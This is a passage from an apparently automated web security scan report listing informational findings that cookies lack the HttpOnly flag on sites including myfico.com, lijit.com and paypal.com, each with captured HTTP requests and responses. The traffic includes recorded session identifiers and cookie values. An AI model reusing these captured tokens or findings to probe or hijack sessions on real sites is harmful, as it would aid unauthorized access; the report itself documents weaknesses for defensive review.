The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /beacon?viewId=1303693642942d8537072b8c9&rand=1303693644394&uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Finfusionsoft&informer=3811901&v=1.0&type=search HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljt_reader=089dpgpkPB0AADy6I-QAAAAL; ljt_ts=t=1303693631643046

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:40:12 GMT
Server: PWS/1.7.1.5
X-Px: ms iad-agg-n33 ( iad-agg-n19), ms iad-agg-n19 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, max-age=0
Pragma: no-cache
Expires: Mon, 25 Apr 2011 01:40:12 GMT
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Set-Cookie: tpro_inst=2b2cba2fe1372b0f599f451b1712306c; expires=Tue, 24-Apr-2012 01:40:15 GMT; path=/; domain=.lijit.com
Set-Cookie: tpro=eJxNkEGOwyAMRe%2FiNaqgBNJkOdeoRggR2iAlEEEy0ijK3cemSjs7v%2B%2BP%2Fc0OS06PMHnod3j6OPhM1WxJ4RfVMHj4kxp9MLDP6pVGXEnjgoFAaCugXdyMbAgkdqQyTVfhxkBxs0xbIby2OClbV0c5uzkSO%2FTYRzZ2PgfbEmw8YQxlOeu0jhSU4xQ3hmnIPtKkmMjQKga%2F%2FrVHoSNEl%2Ba6iRvJSRYao3GjK1xxreZG8Ddh%2BUna0Y40Tf51d0zx9RfNPxmxY%2FDMdjDFjTVke%2BC7ElbKcd9rBT18bSVEXwrgbSv0QnKpO6WFOr7fR%2BHvr4HyfroM5jQYl7ZIjxj8%2BFxCwpNBXDgcxx%2BNU33N; expires=Tue, 24-Apr-2012 01:40:15 GMT; path=/; domain=.lijit.com
Content-Length: 26

<html><body></body></html>

18.505. http://www.lijit.com/res/images/wijitTrack.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /res/images/wijitTrack.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /res/images/wijitTrack.gif?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Finfusionsoft&informer=3811901&viewId=1303693642942d8537072b8c9&rand=1303693642943&type=search&beacon=1 HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:39:35 GMT
Server: PWS/1.7.1.5
X-Px: ms iad-agg-n33 ( iad-agg-n35), ms iad-agg-n35 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Content-Length: 43
Content-Type: image/gif
Connection: keep-alive
Set-Cookie: ljt_reader=R6akywpkPEMAAHjGGMwAAAAf; expires=Thu, 30-Nov-2034 07:00:00 GMT; path=/; domain=.lijit.com
Set-Cookie: ljt_ts=t=1303695575131339; expires=Thu, 30-Nov-2034 07:00:00 GMT; path=/; domain=.lijit.com

GIF89a.............!.......,...........D..;

18.506. http://www.myfico.com/Credit-Cards/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfico.com
Path:   /Credit-Cards/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Credit-Cards/ HTTP/1.1
Host: www.myfico.com
Proxy-Connection: keep-alive
Referer: http://www.myfico.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQQACTBC=IGNPMHKBMEDEICOGCAIJAOLN; NewUser=4/24/2011 7:34:16 PM; fic=vid=197d01359d9645d58263471bdf7625b6&date=20110424073416PM&guid=&lcsource=&learningcenterprogress=&learningcentercompleted=&hasPurchased=false; TransactionID=800900002030400007100900002007; LPID=LPID=FairIsaac&LPLogoName=&LPLogoAltName=&LPLink=; MYFICO=; Experiment=47=A; ShowCCC=t; SourceProdInfo=prodid=&originid=; amcus=; amcd=f39ebcfe7b8d92f801e54dcbf76037de%2C02%2C1%2CGd%7Czg%7Czj%7Czd%7CJt%7CzK%7CJQ%7CCj%7CIV%2C1%2C7jdq%2C6%2C8C@@c_Homepage%5Dg8%2C7jcW%7C14x%2C1%2C1%7Daeo%5Dg8%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%21aep%5Dg8%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%5D0%2C7jcW@%7C%7C%7C@; __qca=P0-1792545009-1303691708467; cmTPSet=Y; CoreID6=96447579584513036917094; 90223518_clogin=l=1303691709&v=1&e=1303693591277; cmRS=&t1=1303691709454&t2=1303691711963&t3=1303691791275&lti=1303691791275&ln=&hr=/Credit-Cards/%3Fcm_re%3DHome-_-MainHeaderNav-_-CreditCardCenter&fti=&fn=%3A0%3BaspnetForm%3A1%3Bemail_signup_module%3A2%3B&ac=&fd=&uer=&fu=&pi=Default.aspx&ho=data.coremetrics.com/eluminate%3F&ci=90223518&cjen=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
p3p: CP="ALL DSP COR CURa PSAa PSDa OUR NOR UNI STA", policyref="http://www.myfico.com/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Mon, 25 Apr 2011 01:22:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 25 Apr 2011 01:22:59 GMT
Connection: close
Set-Cookie: fic=vid=197d01359d9645d58263471bdf7625b6&date=20110424073416PM&guid=&lcsource=&learningcenterprogress=&learningcentercompleted=&hasPurchased=false; expires=Mon, 23-Apr-2012 05:00:00 GMT; path=/
Set-Cookie: ShowCCC=t; domain=.myfico.com; path=/
Set-Cookie: SourceProdInfo=prodid=&originid=; path=/
Content-Length: 27946

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" >


<html>
<head><title>
   myFICO | Credit Card Center
</title>
<meta http-equiv="X-UA-Compatible"
...[SNIP]...

18.507. http://www.myfico.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfico.com
Path:   /Default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Default.aspx HTTP/1.1
Host: www.myfico.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQQACTBC=IGNPMHKBMEDEICOGCAIJAOLN

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
p3p: CP="ALL DSP COR CURa PSAa PSDa OUR NOR UNI STA", policyref="http://www.myfico.com/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Mon, 25 Apr 2011 01:02:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 25 Apr 2011 01:02:56 GMT
Connection: close
Set-Cookie: NewUser=4/24/2011 8:02:18 PM; path=/
Set-Cookie: fic=vid=86a074698f284dc2b96caa5088de7ce2&date=20110424080218PM&guid=&lcsource=&learningcenterprogress=&learningcentercompleted=&hasPurchased=false; expires=Mon, 23-Apr-2012 05:00:00 GMT; path=/
Set-Cookie: TransactionID=800900002030400007100900002007; expires=Thu, 09-Jun-2011 01:02:18 GMT; path=/
Set-Cookie: LPID=LPID=FairIsaac&LPLogoName=&LPLogoAltName=&LPLink=; expires=Thu, 09-Jun-2011 01:02:18 GMT; path=/
Set-Cookie: MYFICO=; path=/
Set-Cookie: Experiment=47=A; expires=Wed, 25-Apr-2012 01:02:18 GMT; path=/
Set-Cookie: ShowCCC=t; domain=.myfico.com; path=/
Set-Cookie: SourceProdInfo=prodid=&originid=; path=/
Content-Length: 26319

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" >


<html>
<head><title>
   Free FICO Credit Score + Check Your Credit Report Online | myFICO
</title>

...[SNIP]...

18.508. https://www.myfico.com/Store/Register.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.myfico.com
Path:   /Store/Register.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Store/Register.aspx?Product=2016&trialdays=2016d10&amuc=4,4125,39332 HTTP/1.1
Host: www.myfico.com
Connection: keep-alive
Referer: http://www.myfico.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQQACTBC=IGNPMHKBMEDEICOGCAIJAOLN; NewUser=4/24/2011 7:34:16 PM; fic=vid=197d01359d9645d58263471bdf7625b6&date=20110424073416PM&guid=&lcsource=&learningcenterprogress=&learningcentercompleted=&hasPurchased=false; TransactionID=800900002030400007100900002007; LPID=LPID=FairIsaac&LPLogoName=&LPLogoAltName=&LPLink=; MYFICO=; Experiment=47=A; ShowCCC=t; SourceProdInfo=prodid=&originid=; amcus=; amcd=f39ebcfe7b8d92f801e54dcbf76037de%2C02%2C1%2CGd%7Czg%7Czj%7Czd%7CJt%7CzK%7CJQ%7CCj%7CIV%2C1%2C7jdq%2C6%2C8C@@c_Homepage%5Dg8%2C7jcW%7C14x%2C1%2C1%7Daeo%5Dg8%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%21aep%5Dg8%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%5D0%2C7jcW@%7C%7C%7C@; __qca=P0-1792545009-1303691708467; cmTPSet=Y; CoreID6=96447579584513036917094; 90223518_clogin=l=1303691709&v=1&e=1303693593868; cmRS=&t1=1303691709454&t2=1303691711963&t3=1303691793867&lti=1303691793867&ln=&hr=http%3A//srv02.amadesa.com/Interaction2/counter%3Fpid%3D534%26uid%3Df39ebcfe7b8d92f801e54dcbf76037de.02%26vsid%3D1%26hc%3D1%26prid%3D2617%7C2186%7C2189%7C2183%7C2819%7C2216%7C2842%7C2375%7C2785%26egid%3D4923%26tid%3D4125%26ttype%3D4%26wid%3D39332%26evt%3D8%2Cw%2C39332%26red%3Dhttp%3A//www.myfico.com/Store/Register.aspx%3FProduct%3D2016%26trialdays%3D2016d10&fti=&fn=%3A0%3BaspnetForm%3A1%3Bemail_signup_module%3A2%3B&ac=&fd=&uer=&fu=&pi=Default.aspx&ho=data.coremetrics.com/eluminate%3F&ci=90223518&cjen=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
p3p: CP="ALL DSP COR CURa PSAa PSDa OUR NOR UNI STA", policyref="http://www.myfico.com/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Mon, 25 Apr 2011 01:23:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 25 Apr 2011 01:23:25 GMT
Connection: keep-alive
Set-Cookie: fic=vid=197d01359d9645d58263471bdf7625b6&date=20110424073416PM&guid=&lcsource=&learningcenterprogress=&learningcentercompleted=&hasPurchased=false; expires=Mon, 23-Apr-2012 05:00:00 GMT; path=/
Set-Cookie: ShowCCC=t; domain=.myfico.com; path=/
Set-Cookie: SourceProdInfo=prodid=&originid=; path=/
Set-Cookie: MYFICO=trialdays2016=10&NewPurchaser=yes; path=/
Set-Cookie: PromoCode=; path=/
Set-Cookie: PromoCode=; path=/
Content-Length: 39835

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" >


<html>
<head><title>
   Please Log In or Create an Account
</title>
<meta http-equiv="X-UA-Comp
...[SNIP]...

18.509. https://www.myfico.com/Store/Register.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.myfico.com
Path:   /Store/Register.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /Store/Register.aspx?Product=2016&trialdays=2016d10&amuc=4%2c4125%2c39332 HTTP/1.1
Host: www.myfico.com
Connection: keep-alive
Referer: https://www.myfico.com/Store/Register.aspx?Product=2016&trialdays=2016d10&amuc=4,4125,39332
Cache-Control: max-age=0
Origin: https://www.myfico.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQQACTBC=IGNPMHKBMEDEICOGCAIJAOLN; TransactionID=800900002030400007100900002007; LPID=LPID=FairIsaac&LPLogoName=&LPLogoAltName=&LPLink=; Experiment=47=A; amcus=; amcd=f39ebcfe7b8d92f801e54dcbf76037de%2C02%2C1%2CGd%7Czg%7Czj%7Czd%7CJt%7CzK%7CJQ%7CCj%7CIV%2C1%2C7jdq%2C6%2C8C@@c_Homepage%5Dg8%2C7jcW%7C14x%2C1%2C1%7Daeo%5Dg8%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%21aep%5Dg8%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%5D0%2C7jcW@%7C%7C%7C@; __qca=P0-1792545009-1303691708467; cmTPSet=Y; CoreID6=96447579584513036917094; MYFICO=trialdays2016=10&NewPurchaser=yes; PromoCode=; acopendivids=nada; acgroupswithpersist=nada; 90223518_clogin=l=1303691709&v=1&e=1303693603459; NewUser=4/24/2011 7:37:16 PM; fic=vid=197d01359d9645d58263471bdf7625b6&date=20110424073416PM&guid=&lcsource=&learningcenterprogress=&learningcentercompleted=&hasPurchased=false; ShowCCC=t; SourceProdInfo=prodid=&originid=; 90223518_clogin=l=1303691709&v=1&e=1303693688117; cmRS=&t1=1303691803452&t2=-1&t3=1303691888115&t4=1303691798835&fti=1303691888115&fn=aspnetForm%3A0%3B&ac=0:S&fd=0%3A8%3Actl00%24cphMainContent%24oLoginControl%24Button1%3B&uer=&fu=Register.aspx%3FProduct%3D2016%26trialdays%3D2016d10%26amuc%3D4%252c4125%252c39332&pi=Store/Register.aspx&ho=data.coremetrics.com/eluminate%3F&ci=90223518&ul=https%3A//www.myfico.com/Store/Register.aspx%3FProduct%3D2016%26trialdays%3D2016d10%26amuc%3D4%2C4125%2C39332&rf=http%3A//www.myfico.com/Default.aspx&cjen=1
Content-Length: 4879

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTYwNjQ2MjUxNQ9kFgJmD2QWCGYPZBYEZg8WAh4HVmlzaWJsZWhkAgEPFgIfAGdkAgIPZBYGAgEPFgIfAGdkAgUPFgIeBGhyZWYFDS9jc3MvZmljby5jc3NkAgYPFgIfAGhkAgQPZBYMZg9kFg
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
p3p: CP="ALL DSP COR CURa PSAa PSDa OUR NOR UNI STA", policyref="http://www.myfico.com/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Mon, 25 Apr 2011 00:37:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 25 Apr 2011 00:37:56 GMT
Connection: keep-alive
Set-Cookie: NewUser=4/24/2011 7:37:18 PM; path=/
Set-Cookie: fic=vid=197d01359d9645d58263471bdf7625b6&date=20110424073416PM&guid=&lcsource=&learningcenterprogress=&learningcentercompleted=&hasPurchased=false; expires=Mon, 23-Apr-2012 05:00:00 GMT; path=/
Set-Cookie: ShowCCC=t; domain=.myfico.com; path=/
Set-Cookie: SourceProdInfo=prodid=&originid=; path=/
Content-Length: 40429

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" >


<html>
<head><title>
   Please Log In or Create an Account
</title>
<meta http-equiv="X-UA-Comp
...[SNIP]...

18.510. https://www.myfico.com/SystemAccess/ForgotMemberInfo.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.myfico.com
Path:   /SystemAccess/ForgotMemberInfo.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /SystemAccess/ForgotMemberInfo.aspx?ReturnUrl=&CreditKit=&& HTTP/1.1
Host: www.myfico.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQQACTBC=IGNPMHKBMEDEICOGCAIJAOLN; TransactionID=800900002030400007100900002007; LPID=LPID=FairIsaac&LPLogoName=&LPLogoAltName=&LPLink=; Experiment=47=A; amcus=; amcd=f39ebcfe7b8d92f801e54dcbf76037de%2C02%2C1%2CGd%7Czg%7Czj%7Czd%7CJt%7CzK%7CJQ%7CCj%7CIV%2C1%2C7jdq%2C6%2C8C@@c_Homepage%5Dg8%2C7jcW%7C14x%2C1%2C1%7Daeo%5Dg8%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%21aep%5Dg8%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%5D0%2C7jcW@%7C%7C%7C@; __qca=P0-1792545009-1303691708467; cmTPSet=Y; CoreID6=96447579584513036917094; NewUser=4/24/2011 7:35:48 PM; fic=vid=197d01359d9645d58263471bdf7625b6&date=20110424073416PM&guid=&lcsource=&learningcenterprogress=&learningcentercompleted=&hasPurchased=false; ShowCCC=t; SourceProdInfo=prodid=&originid=; MYFICO=trialdays2016=10&NewPurchaser=yes; PromoCode=; acopendivids=nada; acgroupswithpersist=nada; 90223518_clogin=l=1303691709&v=1&e=1303693603459; 90223518_clogin=l=1303691709&v=1&e=1303693603470

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
p3p: CP="ALL DSP COR CURa PSAa PSDa OUR NOR UNI STA", policyref="http://www.myfico.com/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Mon, 25 Apr 2011 01:27:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 25 Apr 2011 01:27:45 GMT
Connection: keep-alive
Set-Cookie: fic=vid=197d01359d9645d58263471bdf7625b6&date=20110424073416PM&guid=&lcsource=&learningcenterprogress=&learningcentercompleted=&hasPurchased=false; expires=Mon, 23-Apr-2012 05:00:00 GMT; path=/
Set-Cookie: ShowCCC=t; domain=.myfico.com; path=/
Set-Cookie: SourceProdInfo=prodid=&originid=; path=/
Content-Length: 23918

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" >

<html>
<head><title>
   Forgot your Login ID or Password?
</title>
<meta http-equiv="X-UA-Compatible"
...[SNIP]...

18.511. http://www.nextadvisor.com/link.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /link.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /link.php?kw=gid9a%20identity%20theft%20resource_ordering34&category=identitytheft&link=idguard&id=223 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 03:09:49 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: =106163471; expires=Tue, 24-May-2011 03:09:49 GMT; path=/; domain=.consumercompare.org
Location: http://partners.nextadnetwork.com/z/371/CD1/id4+106163471
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 57

http://partners.nextadnetwork.com/z/371/CD1/id4+106163471

18.512. http://www.oracle.com/pls/www/go.lp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /pls/www/go.lp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pls/www/go.lp?kw=&Src=7054579&Act=9&SC=sckw=WWMK10058753MPP001.GCM.8100.110 HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/us/go/index.html?&Src=7054579&Act=9&SC=sckw=WWMK10058753MPP001.GCM.8100.110
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g/10.1.3.4.0 Oracle-HTTP-Server
Content-Length: 459
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 19:45:38 GMT
Connection: close
Set-Cookie: ORA_UID=WWW_46164790;expires=Mon, 23-Apr-2012 20:45:37 GMT

<HTML>
<HEAD>
<SCRIPT LANGUAGE="javascript">
<!--// v42 -->
<!--//
var start=location.search.indexOf("&SC=")
start += 4
var end=location.search.indexOf("&",start)
if (end<0) end=location.search.length
...[SNIP]...

18.513. https://www.paypal.com/cgi-bin/webscr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.paypal.com
Path:   /cgi-bin/webscr

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/webscr HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:52:47 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: cwrClyrK4LoCV1fydGbAxiNL6iG=sT_I63NuUR8LcE-tuRsQ5JgX5j4FM6fbZrEXkeGREDWPCDpPdl4qfrs6ypGS8IgVxSjjxsRKnGeafhSyMq1ZS1PJW3n0n15HpMokWcZjOuxriDljpK5cu_5qm33nM3QcMOJp-0%7c0mUK39OzvMDBZKIY55RYJ6j_BtoDi5ockOySsmyAlvUwdtM-jxqcTWjhEO6-fDz0fbHX10%7cBr7I2M0muunKbPwJZggbyDS6A5tobB-8N0Tk4dp5P1igDVsWXpxDcsmgKFTN_I1XuL1u-G%7c1303663968; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: KHcl0EuY7AKSMgfvHl7J5E7hPtK=ly4prVVJG_b0nU4XMqMUklBtFWWgyHjwVp8kw7WCtMl1PTFxLmM-9ciCTN0y1zlmQwmDRdwh1nRQZrtB; expires=Sat, 19-Apr-2031 16:52:48 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: cookie_check=yes; expires=Wed, 21-Apr-2021 16:52:48 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; expires=Wed, 21-Apr-2021 16:52:48 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Sat, 19-Apr-2031 16:52:48 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: Apache=10.190.8.159.1303663967738130; path=/; expires=Tue, 16-Apr-41 16:52:47 GMT
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31254

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#">
<head>
